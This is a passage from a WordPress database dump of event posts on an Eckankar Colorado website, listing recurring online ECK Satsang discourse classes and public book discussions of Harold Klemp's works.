of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-07-12','','','2021-01-14 13:20:21','2021-01-14 20:20:21','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-12#038;p=263321',0,'tribe_events','',0),(263331,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-08-09','','','2021-01-14 13:20:21','2021-01-14 20:20:21','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-09#038;p=263321',0,'tribe_events','',0),(263332,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-09-13','','','2021-01-14 13:20:21','2021-01-14 20:20:21','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-13#038;p=263321',0,'tribe_events','',0),(263333,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27;font-size: 20pt\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848\"><strong><span style=\"font-size: 14pt\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-10-11','','','2021-01-14 13:20:22','2021-01-14 20:20:22','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-11#038;p=263321',0,'tribe_events','',0),(263334,2,'2021-01-14 13:16:52','2021-01-14 20:16:52','<p><span style=\"color: #f28a27;font-size: 20pt\">\"The ECK Satsang Discourse - Second Series\"</span></p>\r\n<p><span style=\"color: #484848\"><strong><span style=\"font-size: 14pt\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','ONLINE Member Class - The ECK Satsang Discourse - Second Series','','publish','closed','closed','','online-member-class-the-eck-satsang-discourse-second-series-2-2021-11-08','','','2021-01-14 13:20:22','2021-01-14 20:20:22','',263321,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-11-08#038;p=263321',0,'tribe_events','',0),(263349,2,'2021-01-14 13:24:16','2021-01-14 20:24:16','<p><span style=\"color: #f28a27; font-size: 20pt;\">\"Letters of Light and Sound 1\"</span></p>\r\n<p><span style=\"color: #484848;\"><strong><span style=\"font-size: 14pt;\">- This Class Is Available To Members Of Eckankar-</span><br />\r\n</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\"><strong>NOTE: \'The Letters of Light and Sound 1\' class will be held via conference call.</strong></span></p>\r\n<p><span style=\"font-size: 12pt;\">Eckankar offers unique, year-long, spiritual self-discovery courses. These courses are one of the many benefits that come with <a href=\"https://www.eckankar.org/membership-start/\" target=\"_blank\" rel=\"noopener noreferrer\">ECK membership</a>.</span></p>\r\n<p><span style=\"font-size: 12pt;\">ECK Satsang classes offer a comfortable setting to study the ECK discourses where you can share experiences, insights, and questions. You will learn to recognize your own success with Soul Travel (Out of body experiences), dream travel, and the Light and Sound of God. Through the study of these discourses you can experience a deeper personal relationship with God, get out of karmic debt, and achieve personal liberation in this lifetime.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The ECK discourses are written with an internal rhythm that gradually unfolds your consciousness to the divine within yourself. Each lesson includes a new spiritual exercise and reflective activities. These methods are a step-by-step plan that breaks up old, ingrained patterns and offers new keys to enlightenment.</span></p>','MEMBER CLASS - Letters of Light and Sound 1','','publish','closed','closed','','online-member-class-letters-of-light-and-sound-1-2','','','2021-01-29 20:52:48','2021-01-30 03:52:48','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263349',0,'tribe_events','',0),(263362,2,'2021-01-14 13:30:12','2021-01-14 20:30:12','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">TEMPLATE</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p>ADD PROMO TEXT HERE</p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/The_Spiritual_Laws_of_Life-66-3.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','Book Discussion - TEMPLATE','','publish','closed','closed','','book-discussion-template','','','2021-01-14 13:30:12','2021-01-14 20:30:12','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263362',0,'tribe_events','',0),(263364,2,'2021-01-14 13:38:51','2021-01-14 20:38:51','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Living Word Book 4</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\">The Living Word, Book 4, is a compilation of articles and stories by Sri Harold Klemp, the spiritual leader of Eckankar. Most were written as letters of love and guidance to students of the ECK teachings. Now, for the first time, this book brings these priceless gems together and makes them available to the public.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You have endless possibilities at hand. Every one of these articles from the Master holds a polished gem of wisdom just for you! How can that be? As you explore this lively, powerful, twelve-year collection of Sri Harold\'s Mystic World and Eckankar Journal articles, you will discover your own answer.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Master\'s living wisdom shimmers with love and humor. With stories that linger in your heart and mind, with insights that hover within your golden grasp. The Sound Current is your star of endless possibilities. So read and listen.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2157-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - The Living Word - Book 4','','publish','closed','closed','','online-book-discussion-the-living-word-book-4','','','2021-01-14 14:40:35','2021-01-14 21:40:35','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263364',0,'tribe_events','',0),(263366,2,'2021-01-14 13:38:51','2021-01-14 20:38:51','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">The Living Word Book 4</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\">The Living Word, Book 4, is a compilation of articles and stories by Sri Harold Klemp, the spiritual leader of Eckankar. Most were written as letters of love and guidance to students of the ECK teachings. Now, for the first time, this book brings these priceless gems together and makes them available to the public.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You have endless possibilities at hand. Every one of these articles from the Master holds a polished gem of wisdom just for you! How can that be? As you explore this lively, powerful, twelve-year collection of Sri Harold\'s Mystic World and Eckankar Journal articles, you will discover your own answer.</span></p>\r\n<p><span style=\"font-size: 12pt;\">The Master\'s living wisdom shimmers with love and humor. With stories that linger in your heart and mind, with insights that hover within your golden grasp. The Sound Current is your star of endless possibilities. So read and listen.</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2157-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - The Living Word - Book 4','','publish','closed','closed','','online-book-discussion-the-living-word-book-4-2021-02-07','','','2021-01-14 14:40:35','2021-01-14 21:40:35','',263364,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-02-07#038;p=263364',0,'tribe_events','',0),(263367,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living','','','2021-01-14 14:41:10','2021-01-14 21:41:10','',0,'https://eckankar-colorado.org/?post_type=tribe_events&#038;p=263367',0,'tribe_events','',0),(263369,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-04-04','','','2021-01-14 14:41:10','2021-01-14 21:41:10','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-04-04#038;p=263367',0,'tribe_events','',0),(263370,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-05-02','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-05-02#038;p=263367',0,'tribe_events','',0),(263371,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-06-06','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-06-06#038;p=263367',0,'tribe_events','',0),(263372,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-07-04','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-07-04#038;p=263367',0,'tribe_events','',0),(263373,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-08-01','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-08-01#038;p=263367',0,'tribe_events','',0),(263374,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-09-05','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-09-05#038;p=263367',0,'tribe_events','',0),(263375,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-10-03','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-10-03#038;p=263367',0,'tribe_events','',0),(263376,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-11-07','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-11-07#038;p=263367',0,'tribe_events','',0),(263377,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span class=\"PageHeader\">Spiritual Lessons from Living - Mahanta Transcripts, Book 18</span>\" </em></span><span style=\"font-size: 14pt;\">—by Harold Klemp</span></p>\r\n<p><strong><span style=\"font-size: 14pt;\">-This Book Discussion Is Open To The Public-</span></strong></p>\r\n<p><span style=\"font-size: 12pt;\"> Harold Klemp\'s inspiring and practical approach to spirituality helps many thousands of people worldwide find greater freedom, wisdom, and love in their lives.</span></p>\r\n<p><span style=\"font-size: 12pt;\">His wisdom and heart-opening stories of everyday people having extraordinary experiences tell of a secret truth at work in your life--there is divine purpose and meaning to every experience you have. Every single moment of your life is the handiwork of a higher cause. And you can know what it is. Hint: God\'s love is the key, and spiritual freedom is the goal.</span></p>\r\n<p><span style=\"font-size: 12pt;\">Author of more than one hundred books, he continues to write, including many articles and spiritual-study discourses. His books have been translated into more than 18 languages. These transcripts reveal his approach to giving insights, wisdom, and guidance through the stories of people from around the world. Spanning a variety of topics</span></p>\r\n<p><span style=\"font-size: 12pt;\">You can purchase the book at an ECK Center, through many online bookstores like Amazon, or order from the <strong><a href=\"https://www.eckbooks.org/items/-2234-0.html\" target=\"_blank\" rel=\"noopener\">ECK Bookstore</a></strong>.</span></p>\r\n<p>&nbsp;</p>','ONLINE Book Discussion - Spiritual Lessons from Living - Mahanta Transcripts, Book 18','','publish','closed','closed','','online-book-discussion-spiritual-lessons-from-living-2021-12-05','','','2021-01-14 14:41:11','2021-01-14 21:41:11','',263367,'https://eckankar-colorado.org/?post_type=tribe_events&#038;eventDate=2021-12-05#038;p=263367',0,'tribe_events','',0),(263378,2,'2021-01-14 14:21:03','2021-01-14 21:21:03','<p><span style=\"color: #f28a27; font-size: 20pt;\"><em>\"<span 